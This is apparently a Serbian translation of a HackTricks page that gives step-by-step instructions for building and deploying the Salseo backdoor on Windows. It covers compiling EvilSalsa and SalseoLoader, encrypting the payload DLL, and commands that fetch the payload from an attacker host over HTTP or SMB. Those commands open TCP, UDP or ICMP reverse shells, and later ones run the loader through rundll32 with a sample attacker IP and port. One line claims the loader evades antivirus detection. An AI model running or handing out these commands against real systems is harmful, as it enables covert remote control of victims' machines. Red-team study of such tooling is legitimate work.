hacktricks/backdoors/salseo.md

7.8 KiB

Salseo

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Kompajliranje binarnih fajlova

Preuzmite izvorni kod sa github-a i kompajlirajte EvilSalsa i SalseoLoader. Trebaće vam instaliran Visual Studio za kompajliranje koda.

Kompajlirajte ove projekte za arhitekturu Windows sistema na kojem ćete ih koristiti (ako Windows podržava x64, kompajlirajte ih za tu arhitekturu).

Možete izabrati arhitekturu unutar Visual Studio-a u levom "Build" Tab-u u "Platform Target".

(**Ako ne možete pronaći ove opcije, kliknite na "Project Tab" a zatim na "<Project Name> Properties")

Zatim, izgradite oba projekta (Build -> Build Solution) (Unutar logova će se pojaviti putanja izvršnog fajla):

Priprema Backdoor-a

Prvo, moraćete da enkodujete EvilSalsa.dll. Za to možete koristiti python skriptu encrypterassembly.py ili možete kompajlirati projekat EncrypterAssembly:

Python

python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt

Windows

EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt

Sada imate sve što vam je potrebno da izvršite ceo Salseo postupak: enkodirani EvilDalsa.dll i binarni fajl SalseoLoader.

Otpremite binarni fajl SalseoLoader.exe na mašinu. Ne bi trebalo da budu otkriveni od strane bilo kog AV...

Izvršite backdoor

Dobijanje TCP reverznog shell-a (preuzimanje enkodiranog dll-a putem HTTP-a)

Zapamtite da pokrenete nc kao osluškivač reverznog shella i HTTP server kako biste poslužili enkodirani evilsalsa.

SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>

Dobijanje UDP obrnutog školjka (preuzimanje enkodiranog dll-a putem SMB-a)

Zapamtite da pokrenete nc kao osluškivač obrnutog školjka, i SMB server da posluži enkodirani evilsalsa (impacket-smbserver).

SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>

Dobijanje ICMP reverse shell (enkodirani dll već unutar žrtve)

Ovog puta vam je potreban poseban alat na klijentu da primi reverse shell. Preuzmite: https://github.com/inquisb/icmpsh

Onemogućavanje ICMP odgovora:

sysctl -w net.ipv4.icmp_echo_ignore_all=1

#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0

Izvršite klijenta:

python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"

Unutar žrtve, izvršimo salseo stvar:

SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>

Kompajliranje SalseoLoader-a kao DLL izvođenjem glavne funkcije

Otvorite projekat SalseoLoader koristeći Visual Studio.

Dodajte pre glavne funkcije: [DllExport]

Instalirajte DllExport za ovaj projekat

Alati --> NuGet Package Manager --> Upravljanje NuGet paketima za rešenje...

Pretražite DllExport paket (koristeći karticu Browse), i pritisnite Instaliraj (i prihvatite iskačući prozor)

U vašem projekt folderu pojaviće se fajlovi: DllExport.bat i DllExport_Configure.bat

Deinstalirajte DllExport

Pritisnite Deinstaliraj (da, čudno je ali verujte mi, neophodno je)

Izađite iz Visual Studio-a i izvršite DllExport_configure

Jednostavno izađite iz Visual Studio-a

Zatim, idite u vaš SalseoLoader folder i izvršite DllExport_Configure.bat

Izaberite x64 (ako ćete ga koristiti unutar x64 okruženja, to je bio moj slučaj), izaberite System.Runtime.InteropServices (unutar Namespace for DllExport) i pritisnite Primeni

Otvorite projekat ponovo sa Visual Studio-om

[DllExport] više ne bi trebalo da bude označen kao greška

Izgradite rešenje

Izaberite Tip izlaza = Biblioteka klasa (Projekat --> SalseoLoader Properties --> Application --> Tip izlaza = Biblioteka klasa)

Izaberite x64 platformu (Projekat --> SalseoLoader Properties --> Build --> Ciljna platforma = x64)

Da biste izgradili rešenje: Build --> Izgradi rešenje (Unutar konzole za izlaz pojaviće se putanja nove DLL datoteke)

Testirajte generisanu Dll

Kopirajte i nalepite Dll gde želite da je testirate.

Izvršite:

rundll32.exe SalseoLoader.dll,main

Ako se ne pojavi greška, verovatno imate funkcionalnu DLL!!

Dobijanje shell-a korišćenjem DLL-a

Ne zaboravite da koristite HTTP server i postavite nc listener

Powershell

$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main

CMD

Командна линија

set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini da podržite HackTricks: